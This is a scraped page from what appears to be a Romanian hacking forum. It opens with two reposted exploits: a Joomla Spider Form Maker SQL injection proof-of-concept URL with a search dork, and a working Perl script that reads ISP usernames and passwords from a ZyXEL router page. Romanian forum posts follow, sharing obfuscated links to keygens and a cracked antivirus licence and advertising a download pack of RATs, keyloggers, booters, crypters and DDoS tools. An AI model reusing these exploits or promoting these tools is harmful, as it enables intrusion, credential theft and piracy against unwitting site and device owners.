Aerosol

###################### # Exploit Title : Joomla Spider Form Maker <= 3.4 SQL Injection # Exploit Author : Claudio Viviani # Vendor Homepage : http://web-dorado.com/ # Software Link : http://web-dorado.com/products/joomla-form.html # Dork Google: inurl:com_formmaker # Date : 2014-09-07 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox ###################### # PoC Exploit: http://localhost/index.php?option=com_formmaker&view=formmaker&id=[SQLi] "id" variable is not sanitized. ###################### # Vulnerability Disclosure Timeline: 2014-09-07: Discovered vulnerability 2014-09-09: Vendor Notification 2014-09-10: Vendor Response/Feedback 2014-09-10: Vendor Fix/Patch 2014-09-10: Public Disclosure ##################### Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source

#!/usr/bin/perl # Exploit Author: Sebastián Magof # Hardware: ZyXEL Prestig P-660HNU-T1 # Vulnerable file: wzADSL.asp # location: http://gateway/cgi-bin/wzADSL.asp # Bug: ISP usr+pwd disclosure # Type: Local # Date: 22/09/2014 # Vendor Homepage: http://www.zyxel.com/ # Version: 2.00(AAIJ.1) # Tested on: Linux Fedora 20/Windows 7 # (\/) # (**) Alpha (: #(")(") #usage:perl exploit.pl use LWP::UserAgent; use HTTP::Request; #begin print "\n\n************************************************************\n"; print "* ZyXEL Prestig MODELO P-660HNU-T1v2 local ISP usr+pwd *\n";#default gateway 192.168.1.1 (Arnet Telecom ISP Argentina) print "************************************************************\n\n";#in oher country modify $url line 25 #isp pwd disclosure file my $url = "http://192.168.1.1/cgi-bin/wzADSL.asp"; #UserAgent my $ua = LWP::UserAgent->new(); $ua->agent("Mozilla/5.0"); #Request. my $req = HTTP::Request->new(GET => $url); my $request = $ua->request($req); my $content = $request->content(); #content my ($usr) = $content =~ m/name="wan_UserName" size="30" maxlength="128" value="(.+)" >/; my ($pwd) = $content =~ m/name="wan_Password" size="30" maxlength="128" value="(.+)">/; #ISP usr+pwd Arnet Telecom Argentina; print "User: $usr\n"; print "Password: $pwd\n\n"; exit(0); __EOF__ Source

RTV astia si cand dorm spun minciuni

daca nu au ce face...

Sa vede ca nu ai trecut pe la orele de istorie, daca ai fi fost putin atent la acele ore Hir0sh1 -> Hiroshima :>

a luat @Byte-ul

1. @Byte-ul ban sigur

este ok logo-ul ai ales bine culoarile.

pax nu are rost sa te complici cu el e doar un copil nu-l baga in seama si o sa se potoleasca off// bine ai revenit dupa "mini-vacanta" )

Da man initial nu am postat descriere fiindca aveai jos la "Publisher's Description" pe site-ul de unde downloadezi KeyGeneratorul o seara minunata sa ai! eh imi cer scuze pentru confuzia creata!

)) mdeah

Daca ai ceva important (si chiar vrei sa ramana secret) mai bine vorbesti cu acea persoana "face 2 face" ... (dar daca nu ai posibilitatea sa te intalnesti cu acea persoana ... ) oricum faza cu ascultatul telefoanelor e de mult, chiar si cand nu vorbim la telefon suntem ascultati

daca vei continua cu mentalitatea asta nu o sa ajungi nicaieri man decat sa bagi 50 lei aiurea mai bine te duci si vezi un film de ei si bei o bere (suc daca esti minor) pana mea cu 50 lei nu faci sv de metin (mai ales ca vrei si instalare serverfilles...) eh acum e treaba ta sunt banii tai noi doar te-am sfatuit

Este si logic tinand cont ca e vechi de 2 luni postul...

Am dat copy&paste daca cel care vrea sa descarce s-ar uita pana jos la Publisher's Description ar vedea da mna

Hm gasesti lucruri interesante dar schimba tema (ma ustura ochii ) culorile sunt "orbitoare" si tema in sine e incarcata ex: butoanele - facebook , g+ , youtube etc... sunt foarte mari mai ai de lucrat la el daca ar fi sa iti dau o nota 6/10 (asta cu indulgenta ca ai posturi ok )

Daca vrei sa comentezi fi on topic si incearca sa spui ceva inteligent, cand iei ceva ce nu iti apartine pui sursa! Go home.

Am testat si functioneaza link: 34xk8C0jwyGfMsHn7WhfL2weLmpV9CpT7mkf0m1i32rcu0dV=yl4M2pV8Wrk7n5fvjAgvCkivTqmKjwdNj0jvD0lOz0e34xd7A// (E-46) From VCL Examples: Serial Key Generator is application specially designed for software developers to help protect your applications by serial key registration. Just in a few clicks you are able to generate serial keys and to implement them inside your C# .NET, Visual Basic .NET, Delphi, C++ Builder and Java applications. It is the fastest & easiest tool to use with the lowest price on the market! Try it! Features Generate serial keys using custom number of columns and characters per column. Serial keys can contain uppercase and/or lowercase charactes and/or numbers. Generate up to 2 million serial keys in one turn (1 million with 32 bit version of SKG). Export serial keys to CSV, TXT documents. Import serial keys from CSV, TXT documents. Export serial keys to MySQL and MS SQL databases (SQL Query generator). Export serial keys to encrypted registration files (SHA-512). Update encrypted registration files (add new serial keys, delete or validate existing serial keys). Source code generator for encrypted registration files supporting C#.NET, Visual Basic .NET, C++ Builder, Delphi and Java applications. TRegistrationFile and TMSSQLRegistration components for Delphi & C++ Builder. Validate, add and delete serial keys from MS SQL server. Documentation and example projects for VB .NET, C# .NET, C++ Builder, Delphi and Java. No external dll's needed! Lifetime free upgrades!

Zilele am gasit o licenta Avast Internet Security pe 2 ani link: 34xk8C0jwyGf9n9nuWlVMsVRMWViMypT7mkfMsHn7WhfL2wf3s9ENT1ovs9SLn6d=sGlumrmLKNk6z5lvTqb7sVTM2pjMydW32hVtipiLK5/ (E-46)

Source

Im not responsible for your activity. use it at your own risk!] Use a VM or SandBox! DL LINK! For more informations! Admin Finder VPN Binders Booters Botnet Bruteforcers Chat Exploits CommView Crackers Darkcomet Ddosers Deface Creators Dork Seeker DoS - DDoS Doxing Tools Ebooks Email Encrypter and Decrypter Exploit Scanner Gmail Cracker Havij 1.15 Pro IEInspector Injectors IP scanners AccountCreators Admin Page finder Maillist Blackshades 4.8 Bombers Cpanel bruteforcer Crypters DarkComet REMOVER Deface Pages Dork List Doxers Duplicate Remover Instagram Bots Youtube Bots Keylogger md5 MSN Freezer No-IP Portscanner Proxy Finder 80 DIFFERENT RAT'S !!!! Source

Acum toti vor cere link-uri spre acele poze [fap / fap /fap again ] on: stau si ma gandesc de ce aveau acele poze in telefon?

Cu 50 de lei ai noroc daca dai de un webhost extrem de slab... faceti si voi cumva sa aveti minim 100lei... ca asa nu aveti sanse

o.O wtf? Numele tau este? Cunostiinte? Varsta ? (si alte deastea?) On: Bine ai venit

Bun venit, te descurci destul de bine in PS dar ar fi fost mai ok sa ne lasi doar link nu trebuia sa folosesti ",,